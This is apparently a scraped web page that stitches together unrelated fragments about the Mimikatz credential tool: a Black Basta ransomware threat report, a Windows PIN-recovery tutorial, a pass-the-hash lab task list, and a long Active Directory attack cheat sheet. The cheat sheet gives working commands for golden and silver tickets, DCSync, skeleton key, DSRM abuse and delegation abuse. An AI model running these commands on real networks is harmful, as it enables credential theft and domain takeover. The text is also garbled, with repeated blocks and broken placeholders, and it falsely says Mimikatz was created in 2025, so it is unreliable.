Mimikatz tool
Author: q | 2025-04-24
Offensive Security Tool: Mimikatz. GitHub Link . Mimikatz. Mimikatz, described by the author as just a little tool to play with Windows security. Is an incredibly effective
What is Mimikatz?. Mimikatz is a software tool created by
They use a legitimate copy of the process explorer driver within C:\Windows\system32\drivers\ . This driver is used to kill process handles of the EDR tools. The tool then checks the registry for names of common EDR tools and disables user access control (UAC) before attempting to remove those EDR tools.MITRE ATT&CK: T1562.001: Disable or Modify ToolsMITRE ATT&CK: T1059: Command and Scripting InterpreterTo maintain control, Black Basta has been identified by Kroll as using multiple tools for command and control (C2). Common legitimate tools, including AnyDesk, AteraAgent and Splashtop, have been identified providing remote access.MITRE ATT&CK: T1219: Remote Access SoftwareKroll has identified that the remote access tool known as SystemBC is indicative of Black Basta cases. The tool is preconfigured with C2 domains and can also be utilized as a Tor proxy to provide a channel for the threat actor to deploy scripts and other tools. Figure 6 details the Black Basta configuration of SystemBC in one case. The name of the file is often obfuscated with a random name such as gemoh.exe. SystemBC also creates a scheduled task to maintain persistence, usually named the same as the binary itself within C:\Windows\Tasks\.{ "HOST1": "restoreimagesinc[.]com", "HOST2": "restoreimagesinc[.]com", "PORT1": "443", "TOR": ""}Figure 6 – SystemBC configMITRE ATT&CK: T1090: ProxyEscalationIn a number of Black Basta cases, the threat actor successfully phished a local administrator account; however, Mimikatz is also used to access these credentials via a cache. This is run on the domain controller once access is gained. Mimikatz is often renamed by Black Basta in a likely attempt to evade security solutions even after disabling anti-virus solutions. Mimikatz is a common post-exploitation tool used to collect Windows credentials. It is also used for collecting Kerberos tickets and is most commonly used to extract password hashes from LSA dumps and the security account managers database. The credentials are extracted and are then “cracked” to provide a credential pair. Mimikatz also provides the ability to conduct “pass the hash” by extracting the NTLM hash and allowing the hash to be forwarded to gain access to other devices without the need to know the victim’s password.MITRE ATT&CK: T1003: OS Credential DumpingMITRE ATT&CK: T1558: Steal or Forge Kerberos TicketsBlack Basta attempts to increase privileges with open-source tools such as nircmd.exe and nsudo.exe, which can allow execution at higher levels of privilege. These are often delivered via Qakbot or SystemBC.CobaltStrike provides capabilities to gain increased privileges such as SYSTEM-level execution and “pass the hash” capabilities. Kroll has identified on several Black Basta cases that server message block (SMB) remote service execution is leveraged by pushing files from the domain controller (see Lateral Movement for more details). Pass the hash attempts have also been identified with Type 9 logins. Offensive Security Tool: Mimikatz. GitHub Link . Mimikatz. Mimikatz, described by the author as just a little tool to play with Windows security. Is an incredibly effective Reading Time: 3 Minutes. Offensive Security Tool: Mimikatz. GitHub Link . Mimikatz. Mimikatz, described by the author as just a little tool to play with Windows security. Mimikatz: the Post-exploitation Tool for Offensive Security Testing Mimikatz is a popular open-source post-exploitation tool for offensive security penetration testing. Mimikatz is a collection Mimikatz: the Post-exploitation Tool for Offensive Security Testing Mimikatz is a popular open-source post-exploitation tool for offensive security penetration testing. Mimikatz is a collection Contribute to ParrotSec/mimikatz development by creating an account on GitHub. Contribute to ParrotSec/mimikatz development by creating an account on GitHub. mimikatz is a tool I've What is Mimikatz? Golden ticket attacks started with the development of a tool called Mimikatz. Researcher Benjamin Delpy developed Mimikatz, an executable, in 2025. In In this tutorial we'll show you how to decrypt and recover the original Pin code and Picture Password in Windows 8/8.1, without brute-forcing them. Both Pin code and Picture Password are authentication methods based on a local user account. During setting up a Pin code or Picture Password, you'll be prompted to enter the traditional text-based password. The problem is that Windows 8 will then store your Pin code / Picture password as well as the original text password in plain text. Mimikatz is a free open-source tool to recover this plain-text password, it saves you time and power needed to brute force a 16 character NT/LM password during pen-testing or tech work. Follow this tutorial and you can extract the Windows Pin code and Picture Password in plain text. Note: Mimikatz needs admin privileges to work properly. If you couldn't log on to Windows 8 as administrator, you can reset the forgotten local administrator password or Microsoft account password with PCUnlocker Live CD/USB drive. How to Decrypt / Recover Windows 8 Pin Code and Picture Password? Download the Mimikatz tool (mimikatz_trunk.zip) from Benjamin Delpy's blog. Decompress the zip file and you'll then find that the tool has both 32-bit and 64-bit versions – make sure you pick the correct version. Right-click on the Mimikatz.exe file and select Run as administrator from the context menu. You'll be provided with an interactive prompt that allows you to perform a number of different commands. Firstly we'll need to enable debug mode with the privilege::debug command: privilege::debug Next run the token::elevate command to elevate your privilege to NT Authority\SYSTEM. token::elevate Execute the following command and it will quickly extract all types of plain-text passwords from Windows Vault, including Pin code, Picture Password and traditional text password. vault::list If you use a Microsoft accountComments
They use a legitimate copy of the process explorer driver within C:\Windows\system32\drivers\ . This driver is used to kill process handles of the EDR tools. The tool then checks the registry for names of common EDR tools and disables user access control (UAC) before attempting to remove those EDR tools.MITRE ATT&CK: T1562.001: Disable or Modify ToolsMITRE ATT&CK: T1059: Command and Scripting InterpreterTo maintain control, Black Basta has been identified by Kroll as using multiple tools for command and control (C2). Common legitimate tools, including AnyDesk, AteraAgent and Splashtop, have been identified providing remote access.MITRE ATT&CK: T1219: Remote Access SoftwareKroll has identified that the remote access tool known as SystemBC is indicative of Black Basta cases. The tool is preconfigured with C2 domains and can also be utilized as a Tor proxy to provide a channel for the threat actor to deploy scripts and other tools. Figure 6 details the Black Basta configuration of SystemBC in one case. The name of the file is often obfuscated with a random name such as gemoh.exe. SystemBC also creates a scheduled task to maintain persistence, usually named the same as the binary itself within C:\Windows\Tasks\.{ "HOST1": "restoreimagesinc[.]com", "HOST2": "restoreimagesinc[.]com", "PORT1": "443", "TOR": ""}Figure 6 – SystemBC configMITRE ATT&CK: T1090: ProxyEscalationIn a number of Black Basta cases, the threat actor successfully phished a local administrator account; however, Mimikatz is also used to access these credentials via a cache. This is run on the domain controller once access is gained. Mimikatz is often renamed by Black Basta in a likely attempt to evade security solutions even after disabling anti-virus solutions. Mimikatz is a common post-exploitation tool used to collect Windows credentials. It is also used for collecting Kerberos tickets and is most commonly used to extract password hashes from LSA dumps and the security account managers database. The credentials are extracted and are then “cracked” to provide a credential pair. Mimikatz also provides the ability to conduct “pass the hash” by extracting the NTLM hash and allowing the hash to be forwarded to gain access to other devices without the need to know the victim’s password.MITRE ATT&CK: T1003: OS Credential DumpingMITRE ATT&CK: T1558: Steal or Forge Kerberos TicketsBlack Basta attempts to increase privileges with open-source tools such as nircmd.exe and nsudo.exe, which can allow execution at higher levels of privilege. These are often delivered via Qakbot or SystemBC.CobaltStrike provides capabilities to gain increased privileges such as SYSTEM-level execution and “pass the hash” capabilities. Kroll has identified on several Black Basta cases that server message block (SMB) remote service execution is leveraged by pushing files from the domain controller (see Lateral Movement for more details). Pass the hash attempts have also been identified with Type 9 logins
2025-04-01In this tutorial we'll show you how to decrypt and recover the original Pin code and Picture Password in Windows 8/8.1, without brute-forcing them. Both Pin code and Picture Password are authentication methods based on a local user account. During setting up a Pin code or Picture Password, you'll be prompted to enter the traditional text-based password. The problem is that Windows 8 will then store your Pin code / Picture password as well as the original text password in plain text. Mimikatz is a free open-source tool to recover this plain-text password, it saves you time and power needed to brute force a 16 character NT/LM password during pen-testing or tech work. Follow this tutorial and you can extract the Windows Pin code and Picture Password in plain text. Note: Mimikatz needs admin privileges to work properly. If you couldn't log on to Windows 8 as administrator, you can reset the forgotten local administrator password or Microsoft account password with PCUnlocker Live CD/USB drive. How to Decrypt / Recover Windows 8 Pin Code and Picture Password? Download the Mimikatz tool (mimikatz_trunk.zip) from Benjamin Delpy's blog. Decompress the zip file and you'll then find that the tool has both 32-bit and 64-bit versions – make sure you pick the correct version. Right-click on the Mimikatz.exe file and select Run as administrator from the context menu. You'll be provided with an interactive prompt that allows you to perform a number of different commands. Firstly we'll need to enable debug mode with the privilege::debug command: privilege::debug Next run the token::elevate command to elevate your privilege to NT Authority\SYSTEM. token::elevate Execute the following command and it will quickly extract all types of plain-text passwords from Windows Vault, including Pin code, Picture Password and traditional text password. vault::list If you use a Microsoft account
2025-04-11Any machine:Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain: /sid: /krbtgt: id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'">#Execute mimikatz on DC as DA to grab krbtgt hash:Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName DC'sName>#On any machine:Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain: /sid: /krbtgt: id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'DCsync Attack"'#DCsync using secretsdump.py from impacket with NTLM authenticationsecretsdump.py /:@ -just-dc-ntlm#DCsync using secretsdump.py from impacket with Kerberos Authenticationsecretsdump.py -no-pass -k /@ -just-dc-ntlm">#DCsync using mimikatz (You need DA rights or DS-Replication-Get-Changes and DS-Replication-Get-Changes-All privileges):Invoke-Mimikatz -Command '"lsadump::dcsync /user:"'#DCsync using secretsdump.py from impacket with NTLM authenticationsecretsdump.py Domain>/Username>:Password>@DC'S IP or FQDN> -just-dc-ntlm#DCsync using secretsdump.py from impacket with Kerberos Authenticationsecretsdump.py -no-pass -k /@'S IP or FQDN> -just-dc-ntlmTip: /ptt -> inject ticket on current running session /ticket -> save the ticket on the system for later useSilver Ticket Attack /sid: /target: /service: /rc4: /user: /ptt"'">Invoke-Mimikatz -Command '"kerberos::golden /domain: /sid: /target: /service: /rc4:'s Account NTLM Hash> /user:UserToImpersonate> /ptt"'SPN ListSkeleton Key Attack#Access using the password "mimikatz"Enter-PSSession -ComputerName -Credential \Administrator">#Exploitation Command runned as DA:Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName DC's FQDN>#Access using the password "mimikatz"Enter-PSSession -ComputerName -Credential \AdministratorDSRM AbuseWUT IS DIS?: Every DC has a local Administrator account, this accounts has the DSRM password which is a SafeBackupPassword. We can get this and then pth its NTLM hash to get local Administrator access to DC!#This is a local account, so we can PTH and authenticate!#BUT we need to alter the behaviour of the DSRM account before pth:#Connect on DC:Enter-PSSession -ComputerName #Alter the Logon behaviour on registry:New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehaviour" -Value 2 -PropertyType DWORD -Verbose#If the property already exists:Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehaviour" -Value 2 -Verbose">#Dump DSRM password (needs DA privs):Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -ComputerName DC's Name>#This is a local account, so we can PTH and authenticate!#BUT we need to alter the behaviour of the DSRM account before pth:#Connect on DC:Enter-PSSession -ComputerName 's Name>#Alter the Logon behaviour on registry:New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name
2025-04-16User using ptt attack:Invoke-Mimikatz -Command '"kerberos::ptt "'">#Discover domain joined computers that have Unconstrained Delegation enabledGet-NetComputer -UnConstrained#List tickets and check if a DA or some High Value target has stored its TGTInvoke-Mimikatz -Command '"sekurlsa::tickets"'#Command to monitor any incoming sessions on our compromised serverInvoke-UserHunter -ComputerName NameOfTheComputer> -Poll TimeOfMonitoringInSeconds> -UserName UserToMonitorFor> -DelayWaitInterval> -Verbose#Dump the tickets to disk:Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'#Impersonate the user using ptt attack:Invoke-Mimikatz -Command '"kerberos::ptt "'Note: We can also use Rubeus!Constrained DelegationUsing PowerView and Kekeo: /domain: /rc4:#Then using the TGT we have ask a TGS for a Service this user has Access to through constrained delegationtgs::s4u /tgt: /user:@ /service:#Finally use mimikatz to ptt the TGSInvoke-Mimikatz -Command '"kerberos::ptt "'">#Enumerate Users and Computers with constrained delegationGet-DomainUser -TrustedToAuthGet-DomainComputer -TrustedToAuth#If we have a user that has Constrained delegation, we ask for a valid tgt of this user using kekeotgt::ask /user:UserName> /domain:Domain's FQDN> /rc4:#Then using the TGT we have ask a TGS for a Service this user has Access to through constrained delegationtgs::s4u /tgt: /user:@'s FQDN> /service:Service's SPN>#Finally use mimikatz to ptt the TGSInvoke-Mimikatz -Command '"kerberos::ptt "'ALTERNATIVE:Using Rubeus: /rc4: /impersonateuser: /msdsspn:"" /altservice: /ptt">Rubeus.exe s4u /user:UserName> /rc4:NTLMhashedPasswordOfTheUser> /impersonateuser:UserToImpersonate> /msdsspn:"" /altservice:Optional> /pttNow we can access the service as the impersonated user!🚩 What if we have delegation rights for only a specific SPN? (e.g TIME):In this case we can still abuse a feature of kerberos called "alternative service". This allows us to request TGS tickets for other "alternative" services and not only for the one we have rights for. Thats gives us the leverage to request valid tickets for any service we want that the host supports, giving us full access over the target machine.Resource Based Constrained DelegationWUT IS DIS?: TL;DR If we have GenericALL/GenericWrite privileges on a machine account object of a domain, we can abuse it and impersonate ourselves as any user of the domain to it.
2025-04-17Archives de la catégorie : Tutoriel Que se passe t-il sur le Darknet ? Alpha bay, Silk Road, Hansa: Ils ont fait les gros titres des journaux durant des semaines. Ils étaient des marchés souterrain qui proposaient des biens et services illicites et qui ont respectivement fermé en 2013 et 2017. Tous utilisaient Tor, le réseau Internet parallèle le plus utilisé aujourd’hui, appelé Darknet. DARKNET Les ordinateurs connectés à… How to Hack with Mimikatz: Tutorial If you are a hacker, you probably already know about mimikatz. This tool is widely used by hackers to retrieve passwords. Learn how to use. Cuckoo Sandbox Customization (V2) Get an anti-malware removal report with a very simple cuckoo sandbox customization. Learn how Cuckoo works and how to add custom modules. Cuckoo Sandbox Customization Get an anti-malware removal report with a very simple cuckoo sandbox customization. Learn how Cuckoo works and how to add custom modules. Catch malware with your own Honeypot Catch malware with your own Honeypot – Learn how to deploy a honeypot in 10 minutes with this step by step guide about Cuckoo sandbox. Easy sandboxing.
2025-04-10This repository was archived by the owner on Dec 24, 2024. It is now read-only. Latest commitUse Mimikatz To Perform A Pass-The-Hash AttackPass-the-Hash is a potent technique attackers use to access remote servers or services by leveraging the NTLM or LanMan hash of a user's password. This vulnerability affects all Windows machinesReferencesmodule - sekurlsa by Benjamin Delpymodule - lsadump by Benjamin DelpyPerforming Pass-the-Hash with Mimikatz by Jeff WarrenPass the Hash With Mimikatz: Complete Guide by Richard Deszo on StationXResolve "Access is Denied" using PSExec with a Local Admin Account by Brandon MartinezFixed: Couldn't Install PsExec Service Access Is Denied on Windows by Ellie on AnyViewerUnofficial Guide to Mimikatz & Command Reference by Active Directory SecurityTasksPrepare two Windows machines that can communicate with each other over SMB and RPC (Target 1 and Target 2)On each machine, create a local administrator user with the same username and passwordOn Target 1, open Mimikatz and use the appropriate command to dump NTLM hashes from the LSASS and\or SAM databaseRecord the NTLM hash for the local administrator userUse Mimikatz's "sekurlsa::pth" command to pass-the-hash and spawn a new cmd.exe session on Target 1 using the NTLM hashIn the spawned cmd.exe session, execute ipconfig to display the IP address of Target 1From the spawned cmd.exe session, use PSEXEC with the NTLM hash to authenticate into Target 2Once authenticated into Target 2, execute ipconfig using PSEXEC to display its IP addressConfirm successful authentication as the new user on Target 2 by executing whoami from the spawned remote shell.
2025-04-08